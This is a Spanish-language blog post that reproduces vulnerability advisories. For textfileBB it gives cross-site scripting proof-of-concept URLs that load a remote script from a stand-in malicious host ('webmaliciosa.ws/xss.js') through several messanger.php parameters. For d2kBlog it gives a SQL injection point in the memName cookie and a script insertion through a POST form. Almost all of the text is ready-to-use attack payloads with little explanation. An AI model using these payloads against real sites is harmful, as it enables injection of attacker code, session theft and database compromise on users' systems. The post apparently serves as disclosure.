Vulnerabilidades...
textfileBB <= 1.0 Multiple XSS
software: textfileBB
vendedor website: http://tfbb.jcink.com/
Prueba de Concepto:
http://example.com/messanger.php?mess=%3Cscript%20src=http://webmaliciosa.
ws/xss.js%3E%3C/script%3E
http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http:
//webmaliciosa.ws/xss.js%3E%3C/script%3E
http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http:
//webmaliciosa.ws/xss.js%3E%3C/script%3E
http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http:
//webmaliciosa.ws/xss.js%3E%3C/script%3E
http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscri
pt%20src=http://webmaliciosa.ws/xss.js%3E%3C/body%3E%3C/html%3E
Credito: retard
--------------------------------------------------------------------------------------
d2kBlog Multiple Vulnerabilidades
producto : d2kBlog <= 1.0.3
Vendedor: http://www.d2ksoft.com/
Prueba de Concepto:
SQL_Injection :
Cookie : memName=[SQL_Injection]
Script Insertion :
Default.asp , POST : name=KAPDA&email=KAPDA&msg=&submit=Send+Message
0 Comments:
Publicar un comentario
<< Home